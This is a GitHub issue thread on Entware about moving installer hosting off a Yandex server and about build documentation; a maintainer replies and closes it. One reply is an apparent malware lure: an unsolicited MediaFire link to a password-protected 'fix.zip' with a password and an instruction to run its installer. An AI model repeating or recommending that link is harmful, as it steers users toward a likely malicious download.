Entware/Entware #1080: Can installers be released on GitHub instead of Yandex in Russia?

alexandervlpl, 2024-08-27:
Would it be possible to publish this in a more trustworthy, international way? For example, GitHub releases? Binaries from a Yandex server in Russia don't seem like the best option at the moment, also for users in Russia itself hoping to install VPN protocols. :wink:

As a side note, it would also be great to see some compiling/contributing instructions. Should be possible for somebody to build this without spending days figuring out toolchains, dependencies, etc. Sad to see absolutely zero docs in a project like this, or am I missing something?

miniMuggle, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

alexandervlpl, 2024-08-27:
> Download https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file password: changeme In the installer menu, select "gcc."

Hmm, not sure what's worse, a random file sharing site or Yandex. Come on guys, I'm sure you mean well but there are betters ways of publishing this sort of thing in open source world.

ryzhovau, 2024-08-28:
> Would it be possible to publish this in a more trustworthy, international way? For example, GitHub releases? Binaries from a Yandex server in Russia don't seem like the best option at the moment, also for users in Russia itself hoping to install VPN protocols. 😉

There's no way to satisfy all users around the Globe. The internet is quite fragmented today.
Also, Entware now is 300 000+ files to host, Github is not an option.

> As a side note, it would also be great to see some compiling/contributing instructions. Should be possible for somebody to build this without spending days figuring out toolchains, dependencies, etc. Sad to see absolutely zero docs in a project like this, or am I missing something?

Please, use wiki.

closed 2024-08-28 by ryzhovau

alexandervlpl, 2024-08-28:
I see the problem, yes. Ideally this would be hosted like Termux: a few mirrors in different countries, usually universities or similar.

Found the wiki now, thanks! Maybe add something like "see Wiki for documentation" in the README?